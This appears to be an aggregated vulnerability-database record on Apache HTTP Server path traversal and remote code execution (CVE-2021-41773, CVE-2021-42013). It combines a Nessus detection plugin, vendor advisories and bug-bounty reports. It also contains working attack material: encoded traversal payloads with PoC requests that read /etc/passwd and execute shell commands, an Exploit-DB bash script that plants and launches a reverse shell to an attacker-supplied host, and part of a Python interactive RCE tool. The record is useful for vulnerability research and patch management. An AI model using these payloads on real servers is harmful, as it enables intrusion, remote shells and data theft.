2.4.30 to 2.4.48 (inclusive). (CVE-2021-36160)\n\n - ap_escape_quotes() may write beyond the end of a buffer when given malicious input. No included modules\n pass untrusted data to these functions, but third-party / external modules may. This issue affects Apache\n HTTP Server 2.4.48 and earlier. (CVE-2021-39275)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request\n processing, allowing an external source to DoS the server. This requires a specially crafted request. The\n vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could\n use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This\n issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found\n to be incomplete, see CVE-2021-42013. (CVE-2021-41773)\n\n - It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker\n could use a path traversal attack to map URLs to files outside the directories configured by Alias-like\n directives. If files outside of these directories are not protected by the usual default configuration\n require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased\n pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache\n 2.4.50 and not earlier versions. (CVE-2021-42013)\n\n - A crafted URI sent to httpd configured as a forward proxy (ProxyRequests on) can cause a crash (NULL\n pointer dereference) or, for configurations mixing forward and reverse proxy declarations, can allow for\n requests to be directed to a declared Unix Domain Socket endpoint (Server Side Request Forgery). This\n issue affects Apache HTTP Server 2.4.7 up to 2.4.51 (included). (CVE-2021-44224)\n\n - A carefully crafted request body can cause a buffer overflow in the mod_lua multipart parser\n (r:parsebody() called from Lua scripts). The Apache httpd team is not aware of an exploit for the\n vulnerabilty though it might be possible to craft one. This issue affects Apache HTTP Server 2.4.51 and\n earlier. (CVE-2021-44790)\n\n - A carefully crafted request body can cause a read to a random memory area which could cause the process to\n crash. This issue affects Apache HTTP Server 2.4.52 and earlier. (CVE-2022-22719)\n\n - Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered\n discarding the request body, exposing the server to HTTP Request Smuggling (CVE-2022-22720)\n\n - If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems\n an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server\n 2.4.52 and earlier. (CVE-2022-22721)\n\n - Out-of-bounds Write vulnerability in mod_sed of Apache HTTP Server allows an attacker to overwrite heap\n memory with possibly attacker provided data. This issue affects Apache HTTP Server 2.4 version 2.4.52 and\n prior versions. (CVE-2022-23943)\n\n - Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of\n Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This\n issue affects Apache HTTP Server Apache HTTP Server 2.4 version 2.4.53 and prior versions.\n (CVE-2022-26377)\n\n - The ap_rwrite() function in Apache HTTP Server 2.4.53 and earlier may read unintended memory if an\n attacker can cause the server to reflect very large input using ap_rwrite() or ap_rputs(), such as with\n mod_luas r:puts() function. Modules compiled and distributed separately from Apache HTTP Server that use\n the 'ap_rputs' function and may pass it a very large (INT_MAX or larger) string must be compiled against\n current headers to resolve the issue. (CVE-2022-28614)\n\n - Apache HTTP Server 2.4.53 and earlier may crash or disclose information due to a read beyond bounds in\n ap_strcmp_match() when provided with an extremely large input buffer. While no code distributed with the\n server can be coerced into such a call, third-party modules or lua scripts that use ap_strcmp_match() may\n hypothetically be affected. (CVE-2022-28615)\n\n - In Apache HTTP Server 2.4.53 and earlier, a malicious request to a lua script that calls r:parsebody(0)\n may cause a denial of service due to no default limit on possible input size. (CVE-2022-29404)\n\n - If Apache HTTP Server 2.4.53 is configured to do transformations with mod_sed in contexts where the input\n to mod_sed may be very large, mod_sed may make excessively large memory allocations and trigger an abort.\n (CVE-2022-30522)\n\n - Apache HTTP Server 2.4.53 and earlier may return lengths to applications calling r:wsread() that point\n past the end of the storage allocated for the buffer. (CVE-2022-30556)\n\n - Apache HTTP Server 2.4.53 and earlier may not send the X-Forwarded-* headers to the origin server based on\n client side Connection header hop-by-hop mechanism. This may be used to bypass IP based authentication on\n the origin server/application. (CVE-2022-31813)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/202208-20\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=813429\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=816399\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=816864\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=829722\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=835131\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.gentoo.org/show_bug.cgi?id=850622\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Apache HTTPD users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose >=www-servers/apache-2.4.54\n \nAll Apache HTTPD tools users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose >=app-admin/apache-tools-2.4.54\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-31813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/08/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:apache-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar flag = 0;\n\nvar packages = [\n {\n 'name' : \"app-admin/apache-tools\",\n 'unaffected' : make_list(\"ge 2.4.54\"),\n 'vulnerable' : make_list(\"lt 2.4.54\")\n },\n {\n 'name' : \"www-servers/apache\",\n 'unaffected' : make_list(\"ge 2.4.54\"),\n 'vulnerable' : make_list(\"lt 2.4.54\")\n }\n];\n\nforeach package( packages ) {\n if (isnull(package['unaffected'])) package['unaffected'] = make_list();\n if (isnull(package['vulnerable'])) package['vulnerable'] = make_list();\n if (qpkg_check(package: package['name'] , unaffected: package['unaffected'], vulnerable: package['vulnerable'])) flag++;\n}\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : qpkg_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Apache HTTPD\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-08-16T19:28:11", "description": "Apache HTTP Server is vulnerable to path traversal attacks. An attacker could use a path traversal attack to map URLs to the files outside of the document root are not protected by the \u201crequire all denied\u201d directive in the Apache configuration file\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T21:08:53", "type": "veracode", "title": "Path Traversal", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2022-08-15T14:29:33", "id": "VERACODE:32442", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-32442/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2023-03-22T08:30:29", "description": "### *Detect date*:\n10/07/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nRemote code execution vulnerability was found in Apache HTTP Server. Malicious users can exploit this vulnerability to execute arbitrary code and obtain sensitive information.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nApache HTTP Server earlier than 2.4.51\n\n### *Solution*:\nUpdate to the latest version \n[Download Apache HTTP Server](<https://httpd.apache.org/download.cgi>)\n\n### *Original advisories*:\n[Fixed in Apache HTTP Server 2.4.51](<https://httpd.apache.org/security/vulnerabilities_24.html#2.4.51>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Apache HTTP Server](<https://threats.kaspersky.com/en/product/Apache-HTTP-Server/>)\n\n### *CVE-IDS*:\n[CVE-2021-42013](<https://vulners.com/cve/CVE-2021-42013>)7.5Critical", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-07T00:00:00", "type": "kaspersky", "title": "KLA12372 RCE vulnerability in Apache HTTP Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-03-21T00:00:00", "id": "KLA12372", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12372/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2023-03-22T22:39:16", "bounty": 1000.0, "description": "Hello Apache team,\n\n@fms and myself were able to bypass the latest patch for CVE 2021-41773 in the Apache 2.4.50.\n\nThese are the payloads:\n\n1) %%32%65%%32%65\n2) .%%32%65\n3) .%%32e\n4) .%2%65\n\nPoC Path Traversal\n\nGET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1\nHost: localhost:83\nsec-ch-ua: \";Not A Brand\";v=\"99\", \"Chromium\";v=\"94\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\nPoC RCE\n\nPOST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1\nHost: 192.168.88.201\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9,es;q=0.8\nIf-None-Match: \"2aa6-5cda88e8a6005-gzip\"\nIf-Modified-Since: Wed, 06 Oct 2021 05:38:33 GMT\nConnection: close\nContent-Length: 60\n\necho Content-Type: text/plain; echo; id; uname;apache2ctl -M\n\n## Impact\n\nAn attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T21:56:01", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.50", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2021-11-19T23:45:37", "id": "H1:1404731", "href": "https://hackerone.com/reports/1404731", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-22T22:39:16", "bounty": 1000.0, "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n-\nMy friend Juan Escobar @itsecurityco and me (Fernando Munoz) reported this internally to Apache HTTPd project and worked with them to test the new patch before the new version was released.\n\n## Impact\n\nIf files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-14T23:54:06", "type": "hackerone", "title": "Internet Bug Bounty: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-19T00:14:57", "id": "H1:1400238", "href": "https://hackerone.com/reports/1400238", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-03-22T22:39:20", "bounty": 4000.0, "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n## Impact\n\nThe attacker may be able read the contents of unexpected files and expose sensitive data. If the targeted file is used for a security mechanism, then the attacker may be able to bypass that mechanism. For example, by reading a password file, the attacker could conduct brute force password guessing attacks in order to break into an account on the system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-08T21:47:54", "type": "hackerone", "title": "Internet Bug Bounty: Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49", "bulletinFamily": "bugbounty", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-09T20:19:52", "id": "H1:1394916", "href": "https://hackerone.com/reports/1394916", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T06:03:56", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-25T00:00:00", "type": "exploitdb", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-42013", "CVE-2021-42013"], "modified": "2021-10-25T00:00:00", "id": "EDB-ID:50446", "href": "https://www.exploit-db.com/exploits/50446", "sourceData": "# Exploit: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (2)\r\n# Credits: Ash Daulton & cPanel Security Team\r\n# Date: 24/07/2021\r\n# Exploit Author: TheLastVvV.com\r\n# Vendor Homepage: https://apache.org/\r\n# Version: Apache 2.4.50 with CGI enable\r\n# Tested on : Debian 5.10.28\r\n# CVE : CVE-2021-42013\r\n\r\n#!/bin/bash\r\n\r\necho 'PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI'\r\nif [ $# -eq 0 ]\r\nthen\r\necho \"try: ./$0 http://ip:port LHOST LPORT\"\r\nexit 1\r\nfi\r\ncurl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; echo '/bin/sh -i >& /dev/tcp/$2/$3 0>&1' > /tmp/revoshell.sh\" && curl \"$1/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh\" -d \"echo Content-Type: text/plain; echo; bash /tmp/revoshell.sh\"\r\n\r\n#usage chmod -x CVE-2021-42013.sh\r\n#./CVE-2021-42013_reverseshell.sh http://ip:port/ LHOST LPORT", "sourceHref": "https://www.exploit-db.com/download/50446", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-16T06:03:47", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-11T00:00:00", "type": "exploitdb", "title": "Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-41773", "2021-42013", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-11-11T00:00:00", "id": "EDB-ID:50512", "href": "https://www.exploit-db.com/exploits/50512", "sourceData": "# Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution (RCE) (3)\r\n# Date: 11/11/2021\r\n# Exploit Author: Valentin Lobstein\r\n# Vendor Homepage: https://apache.org/\r\n# Version: Apache 2.4.49/2.4.50 (CGI enabled)\r\n# Tested on: Debian GNU/Linux\r\n# CVE : CVE-2021-41773 / CVE-2021-42013\r\n# Credits : Lucas Schnell\r\n\r\n\r\n#!/usr/bin/env python3\r\n#coding: utf-8\r\n\r\nimport os\r\nimport re\r\nimport sys\r\nimport time\r\nimport requests\r\nfrom colorama import Fore,Style\r\n\r\n\r\nheader = '''\\033[1;91m\r\n \r\n \u2584\u2584\u2584 \u2588\u2588\u2593\u2588\u2588\u2588 \u2584\u2584\u2584 \u2584\u2588\u2588\u2588\u2588\u2584 \u2588\u2588\u2591 \u2588\u2588 \u2593\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2580\u2588\u2588\u2588 \u2584\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2588\u2588\u2588 \r\n \u2592\u2588\u2588\u2588\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2592\u2588\u2588\u2588\u2588\u2584 \u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588\u2588\u2591 \u2588\u2588\u2592\u2593\u2588 \u2580 \u2593\u2588\u2588 \u2592 \u2588\u2588\u2592\u2592\u2588\u2588\u2580 \u2580\u2588 \u2593\u2588 \u2580 \r\n \u2592\u2588\u2588 \u2580\u2588\u2584 \u2593\u2588\u2588\u2591 \u2588\u2588\u2593\u2592\u2592\u2588\u2588 \u2580\u2588\u2584 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2588\u2591\u2592\u2588\u2588\u2588 \u2593\u2588\u2588 \u2591\u2584\u2588 \u2592\u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2588 \r\n \u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2588\u2588\u2584\u2588\u2593\u2592 \u2592\u2591\u2588\u2588\u2584\u2584\u2584\u2584\u2588\u2588 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2591\u2593\u2588 \u2591\u2588\u2588 \u2592\u2593\u2588 \u2584 \u2592\u2588\u2588\u2580\u2580\u2588\u2584 \u2592\u2593\u2593\u2584 \u2584\u2588\u2588\u2592\u2592\u2593\u2588 \u2584 \r\n \u2593\u2588 \u2593\u2588\u2588\u2592\u2592\u2588\u2588\u2592 \u2591 \u2591 \u2593\u2588 \u2593\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2593\u2588\u2592\u2591\u2588\u2588\u2593\u2591\u2592\u2588\u2588\u2588\u2588\u2592 \u2591\u2588\u2588\u2593 \u2592\u2588\u2588\u2592\u2592 \u2593\u2588\u2588\u2588\u2580 \u2591\u2591\u2592\u2588\u2588\u2588\u2588\u2592\r\n \u2592\u2592 \u2593\u2592\u2588\u2591\u2592\u2593\u2592\u2591 \u2591 \u2591 \u2592\u2592 \u2593\u2592\u2588\u2591\u2591 \u2591\u2592 \u2592 \u2591 \u2592 \u2591\u2591\u2592\u2591\u2592\u2591\u2591 \u2592\u2591 \u2591 \u2591 \u2592\u2593 \u2591\u2592\u2593\u2591\u2591 \u2591\u2592 \u2592 \u2591\u2591\u2591 \u2592\u2591 \u2591\r\n \u2592 \u2592\u2592 \u2591\u2591\u2592 \u2591 \u2592 \u2592\u2592 \u2591 \u2591 \u2592 \u2592 \u2591\u2592\u2591 \u2591 \u2591 \u2591 \u2591 \u2591\u2592 \u2591 \u2592\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\r\n \u2591 \u2592 \u2591\u2591 \u2591 \u2592 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591\u2591 \u2591 \u2591 \u2591 \r\n''' + Style.RESET_ALL\r\n\r\n\r\nif len(sys.argv) < 2 :\r\n print( 'Use: python3 file.py ip:port ' )\r\n sys.exit()\r\n\r\ndef end():\r\n print(\"\\t\\033[1;91m[!] Bye bye !\")\r\n time.sleep(0.5)\r\n sys.exit(1)\r\n\r\ndef commands(url,command,session):\r\n directory = mute_command(url,'pwd')\r\n user = mute_command(url,'whoami')\r\n hostname = mute_command(url,'hostname')\r\n advise = print(Fore.YELLOW + 'Reverse shell is advised (This isn\\'t an interactive shell)')\r\n command = input(f\"{Fore.RED}\u256d\u2500{Fore.GREEN + user}@{hostname}: {Fore.BLUE + directory}\\n{Fore.RED}\u2570\u2500{Fore.YELLOW}$ {Style.RESET_ALL}\") \r\n command = f\"echo; {command};\"\r\n req = requests.Request('POST', url=url, data=command)\r\n prepare = req.prepare()\r\n prepare.url = url \r\n response = session.send(prepare, timeout=5)\r\n output = response.text\r\n print(output)\r\n if 'clear' in command:\r\n 